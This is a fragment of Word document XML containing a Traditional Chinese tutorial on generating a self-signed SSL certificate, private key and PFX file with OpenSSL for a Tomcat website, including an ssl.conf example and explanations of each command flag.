            <wp:effectExtent l="12700" t="12700" r="6985" b="14605"/>
            <wp:docPr id="2" name="圖片 2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螢幕擷取畫面, 字型, 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8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C75AD" w14:textId="706B010A" w:rsidR="0098676C" w:rsidRPr="006534B5" w:rsidRDefault="007247F3" w:rsidP="008D3FEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006534B5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>網站自行加入</w:t>
      </w:r>
      <w:r w:rsidR="00950D8C" w:rsidRPr="006534B5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r w:rsidRPr="006534B5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>憑證步驟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F2A6A0" w14:textId="25DFE063" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="008A6FC7" w:rsidP="008D3FEF">
      <w:pPr>
        <w:pStyle w:val="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</w:t>
      </w:r>
      <w:r w:rsidR="007247F3" w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t xml:space="preserve">、建立 </w:t>
      </w:r>
      <w:r w:rsidR="007247F3" w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl.conf </w:t>
      </w:r>
      <w:r w:rsidR="007247F3" w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>設定檔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653328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77A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[req]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27646482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prompt = no</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5170AA1D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default_md = sha256</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3B0109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default_bits = 2048</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74A3A2B0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distinguished_name = dn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44A533C5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x509_extensions = v3_req</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10BFF3E5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  <w:p w14:paraId="2EFC5E2D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[dn]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22B5B0DA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C = TW</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F4E6021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ST = Taiwan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CCAB005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L = Taipei</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36CFAE72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O = WebSecure</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5864245A" w14:textId="3C3C02DC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OU = </w:t>
            </w:r>
            <w:r w:rsidR="000F349E" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>WebSecure</w:t>
            </w:r>
            <w:r w:rsidR="000F349E" w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OU</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D381D7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emailAddress = admin@example.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1128D339" w14:textId="5B0D4500" w:rsidR="0098676C" w:rsidRPr="00A27C52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</w:pPr>
            <w:r w:rsidRPr="00A27C52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 xml:space="preserve">CN = </w:t>
            </w:r>
            <w:r w:rsidR="00E24B90" w:rsidRPr="00A27C52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localhost</w:t>
            </w:r>
            <w:r w:rsidR="0028073D" w:rsidRPr="00A27C52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2023</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="663BFB6F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  <w:p w14:paraId="2629C757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[v3_req]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BD10B4E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subjectAltName = @alt_names</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DAB79BE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  <w:p w14:paraId="066A2FAA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[alt_names]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B344BB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DNS.1 = localhost</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="226087B6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IP.1 = 127.0.0.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C43196C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</w:rPr>
              <w:t>IP.2 = 192.168.30.252</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76B65DD2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4D3A2AF0" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"prompt = no" 是在 SSL 配置文件（ssl.conf）中的一個設置。它表示禁用命令提示，也就是在執行 SSL 相關操作時不需要等待用戶的交互式輸入。這樣的設置一般用於自動化的 SSL 認證流程，可以節省人工操作的時間。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E1786" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0098676C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25293D75" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
        <w:t>設置 "distinguished_name = dn" 表示使用名為 "dn" 的識別名作為 X.509 證書的識別名，具體的識別名通常會在 SSL 配置文件中的其他地方定義。這樣的設置可以確保證書的唯一性和合法性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2779CF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X.509 是一種用於數字證書的標準格式。它包含了證書持有者的身份信息以及發布者的數字簽名，用於驗證證書的真實性。證書擴展版本 v3 是 X.509 的第三版，它增加了更多的信息，例如證書類型和管理政策。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1778DEE8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設置 "x509_extensions = v3_req" 表示在生成 X.509 證書時使用 v3 擴展版本，以增加證書的信息量和安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C228E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539664DF" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
        <w:t>設置 "subjectAltName = @alt_names" 表示使用名為 @alt_names 的替代名稱列表作為主題替代名稱，具體的替代名稱列表通常會在 SSL 配置文件中的其他地方定義。這樣的設置可以增強證書的功能，方便網站管理員管理多個域名或網址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA89D32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1EA36D5E" w14:textId="596D313F" w:rsidR="0098676C" w:rsidRPr="00AC3170" w:rsidRDefault="008A6FC7" w:rsidP="008D3FEF">
      <w:pPr>
        <w:pStyle w:val="3"/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</w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r w:rsidR="007247F3" w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>、建立金鑰與</w:t>
      </w:r>
      <w:r w:rsidR="00AC3170">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>證書</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28919511" w14:textId="1CA918B2" w:rsidR="008A6FC7" w:rsidRDefault="00993D4F" w:rsidP="00993D4F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t>有三樣要</w:t>
      </w:r>
      <w:r w:rsidR="008A6FC7" w:rsidRPr="008A6FC7">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>建立</w:t>
      </w:r>
      <w:r w:rsidR="00093D0A">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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55"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E21F57" w14:paraId="3760AF1A" w14:textId="77777777" w:rsidTr="00BC5A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="132D0805" w14:textId="362DD97B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檔案名稱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EBF0377" w14:textId="632B111A" w:rsidR="00E21F57" w:rsidRDefault="00E21F57" w:rsidP="00993D4F">
            <w:pPr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配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5055" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="4199766B" w14:textId="3C10E21B" w:rsidR="00E21F57" w:rsidRDefault="00E21F57" w:rsidP="00993D4F">
            <w:pPr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說明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21F57" w14:paraId="58938F81" w14:textId="77777777" w:rsidTr="00BC5A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132A562F" w14:textId="35229ED6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web_cert.crt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F69ECB5" w14:textId="1924BFF3" w:rsidR="00E21F57" w:rsidRPr="00993D4F" w:rsidRDefault="00E21F57" w:rsidP="00993D4F">
            <w:pPr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主機根憑證</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A390577" w14:textId="30F4EE62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這是公開的伺服器憑證，它是由證書簽名請求 (CSR) 提交給憑證頒發機構 (CA) 並簽名的。它包含了公鑰、頒發者、有效期等信息，但不包含私鑰。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21F57" w14:paraId="5B5B55B8" w14:textId="77777777" w:rsidTr="00BC5A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FF52992" w14:textId="23CD7E8D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web_private.key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B3020ED" w14:textId="7312E0C5" w:rsidR="00E21F57" w:rsidRPr="00993D4F" w:rsidRDefault="00E21F57" w:rsidP="00993D4F">
            <w:pPr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自行保存</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B489A7B" w14:textId="5DAAC40D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這是與伺服器憑證配套的私鑰。私鑰必須嚴格保護，不能公開。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21F57" w14:paraId="72E29D9A" w14:textId="77777777" w:rsidTr="00BC5A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F4698E" w14:textId="66614EC9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web_ca.pfx (或 .p12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5131FEDA" w14:textId="5C77C88C" w:rsidR="00E21F57" w:rsidRPr="00993D4F" w:rsidRDefault="00E21F57" w:rsidP="00993D4F">
            <w:pPr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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tomcat配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10825424" w14:textId="006C2E1F" w:rsidR="00E21F57" w:rsidRDefault="00E21F57" w:rsidP="00993D4F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993D4F">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>這是一個包含憑證和私鑰的檔案，通常用於備份或轉移憑證。PFX 是 PKCS#12 格式，它可以存儲伺服器憑證、任何中間CA、私鑰，以及（可選的）密碼保護。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="763C5C7D" w14:textId="514FCCC7" w:rsidR="00993D4F" w:rsidRDefault="00993D4F" w:rsidP="00993D4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6FD59E" w14:textId="13423026" w:rsidR="00A53DDC" w:rsidRPr="00654FA3" w:rsidRDefault="00A53DDC" w:rsidP="00993D4F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lastRenderedPageBreak/>
        <w:t>產生指令：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="aff1"/>
        <w:tblW w:w="9019" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9019"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E33E2F" w14:paraId="643321F8" w14:textId="77777777" w:rsidTr="00E33E2F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68AE5C49" w14:textId="73DDEA60" w:rsidR="00E33E2F" w:rsidRDefault="00E33E2F" w:rsidP="008A6FC7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia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openssl req -x509 -new -nodes -sha256 -utf8 -days 3650 -newkey rsa:2048 -keyout </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD5D06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web_</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>private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.key</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -out </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>web_cert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.crt</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -config ssl.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7290269A" w14:textId="77777777" w:rsidR="008A6FC7" w:rsidRPr="00DC0584" w:rsidRDefault="008A6FC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E0E7737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使用 OpenSSL 工具的一個命令，用於生成一個數字證書和一個私鑰。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C005225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參數的含義：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635C351F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-x509</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指示生成的是一個數字證書，而不是請求簽名的證書。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636EE4D0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-new</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指示要生成一個新的數字證書。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304CF7C0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-nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指示不加密生成的私鑰。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C941B7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-sha256</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指定使用 SHA-256 算法計算摘要。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEACF77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-utf8</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指定字符編碼為 UTF-8。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D25D4BC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-days 3650</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指定數字證書的有效天數為 3650 天。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5EF53A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-newkey rsa:2048</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指定使用 RSA 算法並生成 2048 位私鑰。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F2B677" w14:textId="053AC366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 xml:space="preserve">-keyout </w:t>
      </w:r>
      <w:r w:rsidR="00236FA2">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web_private</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>.key</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指定輸出的私鑰文件的名稱。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124EF1F0" w14:textId="7F555B6C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 xml:space="preserve">-out </w:t>
      </w:r>
      <w:r w:rsidR="003C1196">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web_cert</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>.crt</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指定輸出的數字證書文件的名稱。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A43DA8" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3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-config ssl.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>：指定使用的配置文件名稱。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE3C16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64B3DAC0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3246D27C" w14:textId="77777777" w:rsidR="00581631" w:rsidRPr="00DC0584" w:rsidRDefault="00581631">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B57C61F" w14:textId="77777777" w:rsidR="000B6F22" w:rsidRDefault="000B6F22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="434343"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</w:p>
    <w:p w14:paraId="62DBF1E2" w14:textId="4E05B0AD" w:rsidR="0098676C" w:rsidRDefault="007247F3" w:rsidP="008D3FEF">
      <w:pPr>
        <w:pStyle w:val="3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lastRenderedPageBreak/>
        <w:t>八、產生</w:t>
      </w:r>
      <w:r w:rsidR="006F6602">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PFX </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t xml:space="preserve">憑證檔案 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A54B224" w14:textId="5D62FBDC" w:rsidR="00AC3170" w:rsidRPr="00AC3170" w:rsidRDefault="00AC3170" w:rsidP="00AC3170">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC3170">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>產生「web_ca.pfx」 PKCS#12 憑證檔案 (*.pfx 或 *.p12) 給 Tomcat 使用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EF3D39" w14:paraId="395DDE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47CA" w14:textId="2F7BA3D9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openssl pkcs12 -export -in </w:t>
            </w:r>
            <w:r w:rsidR="00CC6007" w:rsidRPr="00522AD0">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF23EC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>web_cert</w:t>
            </w:r>
            <w:r w:rsidR="00CC6007" w:rsidRPr="00522AD0">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF23EC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.crt</w:t>
            </w:r>
            <w:r w:rsidRPr="00522AD0">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="FF23EC"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/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">-inkey </w:t>
            </w:r>
            <w:r w:rsidR="00522AD0" w:rsidRPr="00522AD0">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF23EC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>web_private</w:t>
            </w:r>
            <w:r w:rsidRPr="00522AD0">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF23EC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.key</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -out </w:t>
            </w:r>
            <w:r w:rsidR="00433EFC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web_</w:t>
